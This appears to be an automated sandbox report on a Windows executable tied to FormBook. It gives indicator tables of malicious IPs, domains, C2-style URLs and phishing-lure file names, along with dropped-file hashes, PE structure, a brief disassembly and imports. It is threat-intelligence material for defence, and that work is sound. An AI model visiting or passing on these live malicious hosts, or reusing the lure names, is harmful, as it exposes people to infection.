194.9.94.86  | TT-Slip.bat.exe                     | malicious | FormBook                      | www.torentreprenad.com/r45o/
194.9.94.86  | Doc PI.doc                          | malicious | FormBook                      | www.xn--matfrmn-jxa4m.se/ufuh/
194.9.94.86  | Beauty_Stem_Invoice.doc             | malicious | FormBook                      | www.xn--matfrmn-jxa4m.se/ufuh/
194.9.94.86  | MOQ010524Purchase order.doc         | malicious | FormBook                      | www.xn--matfrmn-jxa4m.se/ufuh/
104.21.112.1 | QUOTATION#070125-ELITE MARINE .exe  | malicious | FormBook                      | www.buyspeechst.shop/w98i/
104.21.112.1 | wxl1r0lntg.exe                      | malicious | DCRat, PureLog Stealer, zgRAT | 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
104.21.112.1 | SH8ZyOWNi2.exe                      | malicious | CMSBrute                      | beammp.com/phpmyadmin/
Match                | Associated Sample Name / URL                   | Detection | Threat Name              | Context
zcdn.8383dns.com     | NWPZbNcRxL.exe                                 | malicious | FormBook                 | 134.122.133.80
zcdn.8383dns.com     | https://199.188.109.181                        | malicious | Unknown                  | 134.122.133.80
zcdn.8383dns.com     | 0Z2lZiPk5K.exe                                 | malicious | DarkTortilla, FormBook   | 134.122.133.80
zcdn.8383dns.com     | DHL DOCS 2-0106-25.exe                         | malicious | FormBook                 | 134.122.135.48
zcdn.8383dns.com     | PO_62401394_MITech_20250601.exe                | malicious | FormBook                 | 134.122.135.48
zcdn.8383dns.com     | Order Inquiry.exe                              | malicious | FormBook                 | 134.122.135.48
zcdn.8383dns.com     | Payment Receipt.exe                            | malicious | FormBook                 | 134.122.133.80
zcdn.8383dns.com     | inv#12180.exe                                  | malicious | FormBook                 | 154.21.203.24
www.buyspeechst.shop | QUOTATION#050125.exe                           | malicious | FormBook                 | 104.21.32.1
www.buyspeechst.shop | QUOTATION#070125-ELITE MARINE .exe             | malicious | FormBook                 | 104.21.112.1
www.buyspeechst.shop | QUOTATION#050125.exe                           | malicious | FormBook                 | 104.21.64.1
www.did-ready.info   | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe  | malicious | FormBook                 | 194.245.148.189
www.milp.store       | PO-0005082025 pdf.exe                          | malicious | FormBook, PureLog Stealer | 194.9.94.85
www.milp.store       | QUOTATION#050125.exe                           | malicious | FormBook                 | 194.9.94.85
www.milp.store       | QUOTATION#070125-ELITE MARINE .exe             | malicious | FormBook                 |
                                                                                                                    • 194.9.94.85
                                                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.9.94.85
                                                                                                                    PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 194.9.94.85
                                                                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.9.94.86
                                                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.9.94.86
                                                                                                                    www.deacapalla.onlineNWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 208.91.197.27
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CSLDE | wWXR5js3k2.exe | malicious | FormBook | 194.245.148.189
 | OVZizpEU7Q.exe | malicious | FormBook | 194.245.148.189
 | KSts9xW7qy.exe | malicious | FormBook | 194.245.148.189
 | miori.arm.elf | malicious | Unknown | 194.245.229.87
 | sh4.elf | malicious | Mirai | 194.245.229.64
 | Fantazy.arm7.elf | malicious | Mirai | 194.245.230.66
 | nabmips.elf | malicious | Unknown | 159.25.86.139
 | nshkmpsl.elf | malicious | Mirai | 194.245.230.82
 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 194.245.148.189
 | x86_32.nn.elf | malicious | Mirai, Okiru | 194.245.186.15
LOOPIASE | PO-0005082025 pdf.exe | malicious | FormBook, PureLog Stealer | 194.9.94.85
 | QUOTATION#050125.exe | malicious | FormBook | 194.9.94.85
 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 194.9.94.85
 | QUOTATION#050125.exe | malicious | FormBook | 194.9.94.85
 | PO-000172483 pdf.exe | malicious | FormBook, PureLog Stealer | 194.9.94.85
 | new.exe | malicious | FormBook | 194.9.94.86
 | PO 1202495088.exe | malicious | FormBook | 194.9.94.86
 | Hire P.O.exe | malicious | FormBook | 194.9.94.86
 | Order.exe | malicious | FormBook | 194.9.94.85
 | SDBARVe3d3.exe | malicious | FormBook | 194.9.94.85
MULTIBAND-NEWHOPEUS | OVZizpEU7Q.exe | malicious | FormBook | 209.74.77.107
 | J1VpshZJfm.exe | malicious | FormBook | 209.74.79.42
 | NWPZbNcRxL.exe | malicious | FormBook | 209.74.79.42
 | zE1VxVoZ3W.exe | malicious | FormBook | 209.74.79.42
 | KSts9xW7qy.exe | malicious | FormBook | 209.74.77.109
 | rQuotation.exe | malicious | FormBook | 209.74.79.40
 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | 209.74.64.189
 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 209.74.79.41
 | ORDER - 401.exe | malicious | FormBook | 209.74.77.107
 | SC_TR11670000_pdf.exe | malicious | FormBook | 209.74.64.58
CLOUDFLARENETUS | Bontrageroutdoors_Project_Update_202557516.pdf | malicious | Unknown | 104.17.25.14
 | 19d6P55zd1.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
 | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
 | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 104.21.80.1
 | AuKUol8SPU.exe | malicious | FormBook | 104.21.48.233
 | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 104.21.64.1
 | EIvidclKOb.exe | malicious | FormBook | 172.67.137.47
 | ht58337iNC.exe | malicious | GuLoader | 172.67.152.246
 | wWXR5js3k2.exe | malicious | FormBook | 188.114.97.3
 | https://probashkontho.com/work/Organization/privacy/index_.html | malicious | Unknown | 104.17.25.14
No context
No context
Process:C:\Windows\SysWOW64\RmClient.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.1239949490932863
Encrypted:false
SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:271D5F995996735B01672CF227C81C17
SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:false
Reputation:high, very likely benign file
Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\9MZZG92yMO.exe
File Type:data
Category:dropped
Size (bytes):285696
Entropy (8bit):7.995511138451883
Encrypted:true
SSDEEP:6144:HOR5jgLr4zQ0BPeMsmE7a5LQnZkLYWzt2pV4xLBd/VJ1E:HQNg8fxeDmE+L72pVitvE
MD5:563D18F2654E320B8908B3D8D233ED11
SHA1:CB7C1A4BB3D76D0640C143EAF9BE70CBA8596FAB
SHA-256:BBF8EFB442C412CFCA278229CA0F5D1B2C5264F5676BC72C4F15BDFD6FED60D8
SHA-512:DADA58283B9A228DA916EE7D36B9418A830294AFC758BBC8B03F98BD7F08182C7E78869206C8C59B2F96E3310653E68AB7F9F2CE55D7842757366198EA80B1D9
Malicious:false
Reputation:low
Preview:...7D8A8\IJ9..OJ.AL0QHNBwG8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMA.0QH@].I8.1.h.8..n.%(?.!:!%E&Ua[9'$V!u-/m39^q! bs.kaU7-/.XXEnMAL0QHN;6N.|X?.wY2.r**.V...t"P.".u*^.O..},W..'!_zX&.XIJ9UUOJ..L0.IOB.z..8XIJ9UUO.MCM;PCNB}C8A8XIJ9UUO_MAL QHN"3G8AxXIZ9UUMJMGL0QHNB7A8A8XIJ9U5KJMCL0QHNB5Gx.8XYJ9EUOJMQL0AHNB7G8Q8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9{!*29AL0..JB7W8A8.MJ9EUOJMAL0QHNB7G8a8X)J9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9U
Process:C:\Users\user\Desktop\9MZZG92yMO.exe
File Type:data
Category:dropped
Size (bytes):285696
Entropy (8bit):7.995511138451883
Encrypted:true
SSDEEP:6144:HOR5jgLr4zQ0BPeMsmE7a5LQnZkLYWzt2pV4xLBd/VJ1E:HQNg8fxeDmE+L72pVitvE
MD5:563D18F2654E320B8908B3D8D233ED11
SHA1:CB7C1A4BB3D76D0640C143EAF9BE70CBA8596FAB
SHA-256:BBF8EFB442C412CFCA278229CA0F5D1B2C5264F5676BC72C4F15BDFD6FED60D8
SHA-512:DADA58283B9A228DA916EE7D36B9418A830294AFC758BBC8B03F98BD7F08182C7E78869206C8C59B2F96E3310653E68AB7F9F2CE55D7842757366198EA80B1D9
Malicious:false
Preview:...7D8A8\IJ9..OJ.AL0QHNBwG8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMA.0QH@].I8.1.h.8..n.%(?.!:!%E&Ua[9'$V!u-/m39^q! bs.kaU7-/.XXEnMAL0QHN;6N.|X?.wY2.r**.V...t"P.".u*^.O..},W..'!_zX&.XIJ9UUOJ..L0.IOB.z..8XIJ9UUO.MCM;PCNB}C8A8XIJ9UUO_MAL QHN"3G8AxXIZ9UUMJMGL0QHNB7A8A8XIJ9U5KJMCL0QHNB5Gx.8XYJ9EUOJMQL0AHNB7G8Q8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9{!*29AL0..JB7W8A8.MJ9EUOJMAL0QHNB7G8a8X)J9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9U
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.2104593851161285
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:9MZZG92yMO.exe
                                                                                                                    File size:1'210'880 bytes
                                                                                                                    MD5:7f427f12cd43c97f6647a6a39735eba8
                                                                                                                    SHA1:b6e68860ffd9fddf9e3248b0d89365eab8e4310c
                                                                                                                    SHA256:c3435c7d8eb6822ff755dd1f48266e8bc267a8d8b87fee7a4ebe8ec8efdd1c30
                                                                                                                    SHA512:c4b0c74dd8c3c275da485abbbd5dfa60489e3612aa0baf23d469f00aae61e49464fc802a8cdfbfb3f3eb690422691a03887a437ecb9a1ea711c270f354d61ca8
                                                                                                                    SSDEEP:24576:Iu6J33O0c+JY5UZ+XC0kGso6FaV2aWbcSnnsa7anLumD99WY:iu0c++OCvkGs9FaVKZnsOanFyY
                                                                                                                    TLSH:4C45BE22B3DD8360CB6A9173BF6D77016EBFB8650630F95B1F880D79AD501A1163C6A3
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                    Icon Hash:f4c8ccced8c884d4
                                                                                                                    Entrypoint:0x427dcd
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x675A1C47 [Wed Dec 11 23:12:07 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
  call 00007F56C0B1A54Ah
  jmp 00007F56C0B0D314h
  int3
  int3
  int3
  int3
  int3
  int3
  int3
  int3
  int3
  push edi
  push esi
  mov esi, dword ptr [esp+10h]
  mov ecx, dword ptr [esp+14h]
  mov edi, dword ptr [esp+0Ch]
  mov eax, ecx
  mov edx, ecx
  add eax, esi
  cmp edi, esi
  jbe 00007F56C0B0D49Ah
  cmp edi, eax
  jc 00007F56C0B0D7FEh
  bt dword ptr [004C31FCh], 01h
  jnc 00007F56C0B0D499h
  rep movsb
  jmp 00007F56C0B0D7ACh
  cmp ecx, 00000080h
  jc 00007F56C0B0D664h
  mov eax, edi
  xor eax, esi
  test eax, 0000000Fh
  jne 00007F56C0B0D4A0h
  bt dword ptr [004BE324h], 01h
  jc 00007F56C0B0D970h
  bt dword ptr [004C31FCh], 00000000h
  jnc 00007F56C0B0D63Dh
  test edi, 00000003h
  jne 00007F56C0B0D64Eh
  test esi, 00000003h
  jne 00007F56C0B0D62Dh
  bt edi, 02h
  jnc 00007F56C0B0D49Fh
  mov eax, dword ptr [esi]
  sub ecx, 04h
  lea esi, dword ptr [esi+04h]
  mov dword ptr [edi], eax
  lea edi, dword ptr [edi+04h]
  bt edi, 03h
  jnc 00007F56C0B0D4A3h
  movq xmm1, qword ptr [esi]
  sub ecx, 08h
  lea esi, dword ptr [esi+08h]
  movq qword ptr [edi], xmm1
  lea edi, dword ptr [edi+08h]
  test esi, 00000007h
  je 00007F56C0B0D4F5h
  bt esi, 03h
  jnc 00007F56C0B0D548h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5f200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5f200 | 0x5f200 | 3f31ba28eaff7d2690bbde2d322ea380 | False | 0.9412933229303548 | data | 7.936633454100918 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc74e8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc7610 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc7738 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7860 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.24202127659574468
RT_ICON | 0xc7cc8 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | Great Britain | 0.145264116575592
RT_ICON | 0xc8df0 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | Great Britain | 0.09723352318958503
RT_ICON | 0xcb458 | 0x2b56 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9077879935100054
RT_MENU | 0xcdfb0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xce000 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xce594 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcec20 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf0b0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcf6ac | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcfd08 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd0170 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd02c8 | 0x559ef | data | | | 1.000330764207891
RT_GROUP_ICON | 0x125cb8 | 0x3e | data | English | Great Britain | 0.8548387096774194
RT_GROUP_ICON | 0x125cf8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125d0c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x125d20 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x125d34 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x125e10 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
